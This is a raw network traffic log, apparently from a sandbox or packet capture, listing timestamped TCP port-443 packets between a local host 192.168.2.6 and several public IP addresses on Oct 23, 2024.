                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.614675999 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.614721060 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.614785910 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.645483017 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.645541906 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.645571947 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.645585060 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.645612001 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.645880938 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.646039009 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.646073103 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.646121979 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.647989988 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.648051023 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.648066044 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.648077011 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.648108006 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.648122072 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.655325890 CEST44349765184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675446987 CEST4434976713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675525904 CEST4434976713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675570011 CEST49767443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675836086 CEST49767443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675853014 CEST4434976713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675863028 CEST49767443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.675868988 CEST4434976713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.676265001 CEST4434976813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.676431894 CEST4434976813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.676490068 CEST49768443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.677732944 CEST49768443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.677751064 CEST4434976813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.677762032 CEST49768443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.677767992 CEST4434976813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.682707071 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.682746887 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.682868958 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683089018 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683125973 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683192015 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683289051 CEST49774443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683305979 CEST4434977413.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683394909 CEST49775443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.683404922 CEST4434977513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.686856031 CEST4434976913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.686997890 CEST4434976913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687083006 CEST49769443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687164068 CEST49769443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687164068 CEST49769443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687207937 CEST4434976913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687238932 CEST4434976913.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687450886 CEST4434976613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.687834978 CEST4434976613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.688014030 CEST49766443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.688014030 CEST49766443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.688014030 CEST49766443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.689085960 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.690079927 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.690124035 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.690193892 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.690737009 CEST49776443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.690769911 CEST4434977613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.691874981 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.691900015 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.691940069 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.691963911 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.691966057 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692255974 CEST49777443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692270041 CEST4434977713.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692490101 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692519903 CEST4434977013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692670107 CEST4434977013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692720890 CEST49770443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692758083 CEST49770443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692763090 CEST4434977013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692771912 CEST49770443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.692775011 CEST4434977013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695091009 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695111036 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695190907 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695274115 CEST49778443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695298910 CEST4434977813.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695498943 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695616961 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.695878983 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.733422995 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.733494997 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.733619928 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.733692884 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.733756065 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.733757019 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.739375114 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.764240026 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.764307976 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.764329910 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.764364004 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.764389038 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.764420986 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765080929 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765141964 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765289068 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765300035 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765312910 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765341997 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.765433073 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.766830921 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.766891956 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.766920090 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.766949892 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.766968012 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.807734013 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.848939896 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849009037 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849056959 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849062920 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849100113 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849149942 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849152088 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849169016 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849216938 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849224091 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849239111 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849303007 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.849380016 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.854161024 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.854160070 CEST44349765184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.854233980 CEST44349765184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.854237080 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.854252100 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.854315042 CEST49765443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.871711969 CEST49765443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.871711969 CEST49765443192.168.2.6184.28.90.27
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.871754885 CEST44349765184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.871772051 CEST44349765184.28.90.27192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882518053 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882597923 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882601023 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882641077 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882658958 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882683039 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.882778883 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.883037090 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.883086920 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.883096933 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.883124113 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.883177996 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.884160995 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.884219885 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.884229898 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.884243965 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.884279966 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.894150972 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.894428968 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.894499063 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.894522905 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.894870996 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.896136045 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.896195889 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.896387100 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.925031900 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.925050974 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.926429033 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.926502943 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.926525116 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.926554918 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.926594973 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.939325094 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.967806101 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.967897892 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.967957020 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.967977047 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.968017101 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.968070984 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.969187021 CEST49772443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.969211102 CEST44349772141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.972244024 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.988647938 CEST49766443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.988682985 CEST4434976613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.992074013 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:04.992145061 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001307964 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001339912 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001405001 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001425982 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001442909 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001454115 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001478910 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001498938 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.001595974 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.002299070 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.002319098 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.002362013 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.002371073 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.002403975 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.003752947 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.003774881 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.003818989 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.003828049 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.003859043 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004360914 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004401922 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004426003 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004436970 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004452944 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004479885 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.004504919 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.024234056 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.024271965 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.025306940 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054198980 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054244041 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054276943 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054285049 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054303885 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054339886 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054342985 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054349899 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054385900 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054390907 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054562092 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054603100 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054606915 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054718971 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.054791927 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.075287104 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.084517956 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.084566116 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.084625006 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.088576078 CEST49728443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.088608027 CEST44349728141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.120654106 CEST49779443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.120675087 CEST44349779141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.179382086 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.179457903 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.179495096 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.179735899 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.227340937 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.321706057 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.321804047 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.321883917 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.322510004 CEST49780443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.322546959 CEST44349780141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.323308945 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.323371887 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.323436022 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.323776960 CEST49781443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.323801041 CEST44349781141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.325747967 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.325769901 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.325844049 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.326173067 CEST49782443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.326216936 CEST44349782141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.327104092 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.327142000 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.327193022 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.327790022 CEST49783443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.327821016 CEST44349783141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.337145090 CEST49773443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.337155104 CEST44349773141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.345082045 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.345113993 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.345206976 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.346168995 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.346175909 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.346335888 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.349822998 CEST49785443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.349843979 CEST44349785141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.351888895 CEST49786443192.168.2.691.212.166.21
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.351897955 CEST4434978691.212.166.21192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.428864956 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.435004950 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.435026884 CEST4434977140.113.103.199192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.435137033 CEST49771443192.168.2.640.113.103.199
                                                                                                                                                                                                                              Oct 23, 2024 20:04:05.437647104 CEST4434977513.107.253.72192.168.2.6
